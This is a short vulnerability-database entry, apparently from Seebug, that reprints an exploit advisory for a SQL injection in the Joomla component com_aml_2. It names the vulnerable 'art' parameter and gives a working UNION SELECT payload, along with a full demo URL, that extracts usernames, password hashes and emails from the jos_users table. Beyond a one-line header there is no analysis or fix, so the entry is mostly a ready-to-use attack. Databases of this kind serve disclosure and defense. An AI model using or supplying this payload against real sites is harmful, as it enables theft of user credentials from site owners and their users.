Joomla Component com_aml_2 SQL Injection Vulnerability

2010-03-24T00:00:00
ID SSV:19325
Type seebug
Reporter Root
Modified 2010-03-24T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Joomla Component com_aml_2 SQL Injection Vulnerability
========================================================
 
####################################################################
.:. Author : Metropolis
 
.:. Home : http://metropolis.fr.cr/
 
.:. Script : Joomla Component com_aml_2
 
.:. Bug Type : SQL Injection
 
####################################################################
 
===[ Vulnerable File ]===
 
/index.php?option=com_aml_2&task=annonce&page=detail&rub=immobilier&art=75 [SQL Injection]
 
 
===[ ExploiT ]===
 
75+and+1=0+union+select+1,2,3,4,concat(username,0xa,password,email),6,7,8+from+jos_users--
 
 
===[ Demo ]===
 
http://site.com/index.php?option=com_aml_2&task=annonce&page=detail&rub=immobilier&art=75+and+1=0+union+select+1,2,3,4,concat%28username,0xa,password,email%29,6,7,8+from+jos_users--
 
 
 
 ####################################################################
 
Vive la France !